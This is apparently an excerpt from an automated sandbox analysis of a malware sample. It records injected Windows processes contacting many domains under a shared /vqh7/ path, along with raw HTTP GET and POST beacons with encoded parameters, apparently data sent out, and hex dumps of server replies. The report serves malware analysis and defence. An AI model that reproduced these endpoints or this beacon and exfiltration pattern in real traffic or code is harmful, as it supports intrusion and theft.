65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Thu, 23 Feb 2023 10:18:46 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Thu, 23 Feb 2023 10:18:58 GMTcontent-type: text/htmltransfer-encoding: chunkedvary: Accept-Encodingserver: NginXcontent-encoding: gzipconnection: closeData Raw: 36 45 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f bf 20 35 af 28 b5 b8 a4 12 59 5e 1f 66 a2 3e d4 35 00 74 17 fb af 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6E(HML),I310Vp/JLII&T";Ct@}4l"(/ 5(Y^f>5t0
          Source: chkdsk.exe, 00000003.00000002.574754750.00000000062BE000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
          Source: chkdsk.exe, 00000003.00000002.574754750.0000000006A98000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000003.00000002.575257315.0000000007E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://img.sedoparking.com
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.awc.icu
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.awc.icu/vqh7/
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.awc.icu/vqh7/o
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.awc.icuReferer:
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dinggubd.net
          Source: explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dinggubd.net/vqh7/
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.dinggubd.netReferer:
          Source: explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frogair.online
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frogair.online/vqh7/
          Source: explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frogair.online/vqh7/7
          Source: explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.frogair.onlineReferer:
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gachthe365.site
          Source: explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gachthe365.site/vqh7/
          Source: explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gachthe365.siteReferer:
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heroclassicrally.co.uk
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heroclassicrally.co.uk/vqh7/
          Source: explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heroclassicrally.co.uk/vqh7/-
          Source: chkdsk.exe, 00000003.00000002.575257315.0000000007E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.heroclassicrally.co.uk/vqh7/?ch=1&hTb82V=lfF%2FIMXZC9z0Y8i3jJMV2iASSilbfJLlfXmtIcwvtHqqMq
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.heroclassicrally.co.ukReferer:
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hotelyeah.top
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hotelyeah.top/vqh7/
          Source: explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hotelyeah.top/vqh7/K6jN
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.hotelyeah.topReferer:
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jewelryimpact.com
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jewelryimpact.com/vqh7/
          Source: chkdsk.exe, 00000003.00000002.574754750.0000000005E08000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.jewelryimpact.com/vqh7/?ch=1&hTb82V=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4%2FWAP1IcCYAcw2um1tEg7
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krankenzusatz.net
          Source: explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krankenzusatz.net/vqh7/
          Source: explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.krankenzusatz.netReferer:
          Source: chkdsk.exe, 00000003.00000002.574754750.0000000006774000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nativealternatives.com
          Source: explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nativealternatives.com/vqh7/
          Source: explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nativealternatives.comReferer:
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nkgtrust.org
          Source: explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nkgtrust.org/vqh7/
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.nkgtrust.orgReferer:
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otopodlogi.com
          Source: explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otopodlogi.com/vqh7/
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.otopodlogi.comReferer:
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.readyexechub.com
          Source: explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.readyexechub.com/vqh7/
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.specigain.online
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.specigain.online/vqh7/
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.specigain.onlineReferer:
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tobinrasheedja.cyou
          Source: explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tobinrasheedja.cyou/vqh7/
          Source: explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tobinrasheedja.cyouReferer:
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.treebarktees.com
          Source: explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.treebarktees.com/vqh7/
          Source: explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.treebarktees.comReferer:
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.verde-amar.info
          Source: explorer.exe, 00000002.00000003.557996296.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.450450029.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.552398783.000000000856B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.568115611.000000000856B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.verde-amar.info/vqh7/
          Source: 50-ET7Wv7.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 50-ET7Wv7.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 50-ET7Wv7.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: chkdsk.exe, 00000003.00000003.394286527.0000000005215000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 50-ET7Wv7.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: chkdsk.exe, 00000003.00000003.394286527.0000000005215000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.3.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: chkdsk.exe, 00000003.00000003.394286527.0000000005215000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.3.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: chkdsk.exe, 00000003.00000003.394286527.0000000005215000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.3.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: chkdsk.exe, 00000003.00000003.394286527.0000000005215000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.3.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: chkdsk.exe, 00000003.00000003.394286527.0000000005215000.00000004.00000020.00020000.00000000.sdmp, 50-ET7Wv7.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: chkdsk.exe, 00000003.00000002.574754750.00000000065E2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.krankenzusatz.net/vqh7/?hTb82V=y31BrajEErp1x9Bd7G4Dy3nypbIU9ptiP4J7BVkyXNwnX592eZZvtl/Of
          Source: chkdsk.exe, 00000003.00000002.574754750.0000000006A98000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000003.00000002.575257315.0000000007E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
          Source: chkdsk.exe, 00000003.00000002.575257315.0000000007E50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tucowsdomains.com/
          Source: unknownHTTP traffic detected: POST /vqh7/ HTTP/1.1Host: www.jewelryimpact.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.jewelryimpact.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jewelryimpact.com/vqh7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 68 54 62 38 32 56 3d 7e 34 7e 6c 77 41 61 58 79 38 76 75 72 73 7a 39 59 76 45 63 59 79 39 79 28 4b 39 6b 41 4a 42 65 50 48 58 70 4b 59 53 4d 43 49 63 69 75 67 63 55 47 78 47 4f 4b 50 67 63 55 4f 6f 63 43 4a 69 6d 79 74 71 62 33 31 42 69 4a 6d 52 6c 64 79 63 6d 63 39 6f 58 66 57 6a 4a 38 79 38 59 71 50 51 4b 7e 73 6f 5a 64 48 55 4c 73 52 67 6f 6b 72 70 53 50 4d 4b 69 28 4b 69 54 53 66 76 4a 53 49 77 45 6f 79 79 70 74 75 53 7a 49 30 35 45 46 42 48 6e 45 5a 4a 42 55 6d 4f 73 77 67 6a 47 36 6d 6b 54 33 36 5a 78 4b 72 4a 64 63 6b 47 6a 6c 37 51 66 43 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: hTb82V=~4~lwAaXy8vursz9YvEcYy9y(K9kAJBePHXpKYSMCIciugcUGxGOKPgcUOocCJimytqb31BiJmRldycmc9oXfWjJ8y8YqPQK~soZdHULsRgokrpSPMKi(KiTSfvJSIwEoyyptuSzI05EFBHnEZJBUmOswgjG6mkT36ZxKrJdckGjl7QfCg).
          Source: unknownDNS traffic detected: queries for: www.verde-amar.info
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=c3T4NncdiggRvhiDkOPUV54pY2f+jJK99/S+uCks/lUPYoCt0sy68wjf82DqpFtmKPoTAmkWX3bWObR3jmvMIkerc/mY+VSrAA==&ryQDc=vwyb4 HTTP/1.1Host: www.verde-amar.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /vqh7/?hTb82V=z6WFz1ekjtuVhInuStcoC2ViyZsFVb4/WAP1IcCYAcw2um1tEg7dOsgaRrguIqza4tr80FhnA0YyZCpgAYYfeED05Aw0pMEaxg==&ryQDc=vwyb4 HTTP/1.1Host: www.jewelryimpact.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
